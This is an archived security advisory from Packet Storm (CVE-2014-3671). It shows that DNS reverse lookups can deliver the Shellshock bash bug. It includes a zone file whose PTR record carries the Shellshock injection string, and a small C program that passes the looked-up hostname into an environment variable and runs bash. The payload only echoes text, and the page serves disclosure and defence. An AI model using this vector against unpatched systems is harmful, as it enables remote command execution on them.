Exploit the possiblities

DNS Reverse Lookup Shellshock

DNS Reverse Lookup Shellshock
Posted Oct 13, 2014
Authored by Dirk-Willem van Gulik, Stephane Chazelas

DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability.

tags | exploit, bash
advisories | CVE-2014-3671, CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
MD5 | 6385a3fffc56c9fb074a8644a4532ebf

DNS Reverse Lookup Shellshock

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory

DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)

CVE-2014-3671

references:
CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278
CVE-2014-7186 and, CVE-2014-7187

* Summary:

Above CVEs detail a number of flaws in bash prior related to the parsing
of environment variables (aka BashBug, Shellshock). Several networked
vectors for triggering this bug have been discovered; such as through
dhcp options and CGI environment variables in webservers [1].

This document is to advise you of an additional vector; through a
reverse lookup in DNS; and where the results of this lookup are
passed, unsanitized, to an environment variable (e.g. as part of
a batch process).

This vector is subtly different from a normal attack vector, as the
attacker can 'sit back' and let a (legitimate) user trigger the
issue; hence keeping the footprint for a IDS or WAAS to act on small.

* Resolvers/systems affected:

At this point of time the stock resolvers (in combination with the libc
library) of OSX 10.9 (all versions) and 10.10/R2 are the only known
standard installations that pass the bash exploit string back and
up to getnameinfo().

That means that UNpatched systems are vulnerable through this vector
PRIOR to the bash update documented in http://support.apple.com/kb/DL1769.

Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem
unaffected in their stock install as libc/libresolver and DNS use
different escaping mechanisms (octal v.s. decimal).

We're currently following investing a number of async DNS resolvers
that are commonly used in DB cache/speed optimising products and
application level/embedded firewall systems.

Versions affected:

See above CVEs as your primary source.

* Resolution and Mitigation:

In addition to the mitigations listed in above CVEs - IDSes and similar
systems may be configured to parse DNS traffic in order to spot the
offending strings.

Also note that Apple DL1769 addresses the Bash issue; NOT the vector
through the resolver.

* Reproducing the flaw:

A simple zone file; such as:

$TTL 10;
$ORIGIN in-addr.arpa.
@ IN SOA ns.boem.wleiden.net dirkx.webweaving.org (
666 ; serial
360 180 3600 1800 ; very short lifespan.
)
IN NS 127.0.0.1
* PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS"

can be used to create an environment in which to test the issue with existing code
or with the following trivial example:

#include <sys/socket.h>
#include <netdb.h>
#include <assert.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>

int main(int argc, char ** argv) {
struct in_addr addr;
struct sockaddr_in sa;
char host[1024];

assert(argc==2);
assert(inet_aton(argv[1],&addr) == 1);

sa.sin_family = AF_INET;
sa.sin_addr = addr;

assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa,
host, sizeof host, NULL, 0, NI_NAMEREQD));

printf("Lookup result: %s\n\n", host);

assert(setenv("REMOTE_HOST",host,1) == 0);
execl("/bin/bash",NULL);
}


Credits and timeline

The flaw was found and reported by Stephane Chazelas (see CVE-2014-6271
for details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found
the DNS reverse lookup vector.

09-04-2011 first reported.
2011, 2014 issue verified on various embedded/firewall/waas
systems and reported to vendors.
??-09-2014 Apple specific exploited seen.
11-10-2014 Apple confirms that with DL1769 in place that
"The issue that remains, while it raises
interesting questions, is not a security
issue in and of itself."

* Common Vulnerability Scoring (Version 2) and vector:

See CVE-2014-6271.

1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md)
1.10 / : 1726 $
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: This message is encrypted and/or signed with PGP (gnu-pg, gpg). Contact dirkx@webweaving.org if you cannot read it.

iQCVAwUBVDujjDGmPZbsFAuBAQKGqwP+OOzdL8PDZF7Ckpk1UCxZZoWYvvGUHBqs
dE8ioLaQsRDKJ+V2EbBGHmSucYLPqBVfRYaYar21KCl6DAcxzQmxhymxxpRjBPsP
uauqW7dYZQASDkKG9Rn0KA4dXNo9GjrJMrTcwkfkoNb5EtVtiMDX8VXoZ4SqLJS0
v5s8ZtQiIw4=
=I6vK
-----END PGP SIGNATURE-----


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    15 Files
  • 22
    Nov 22nd
    23 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close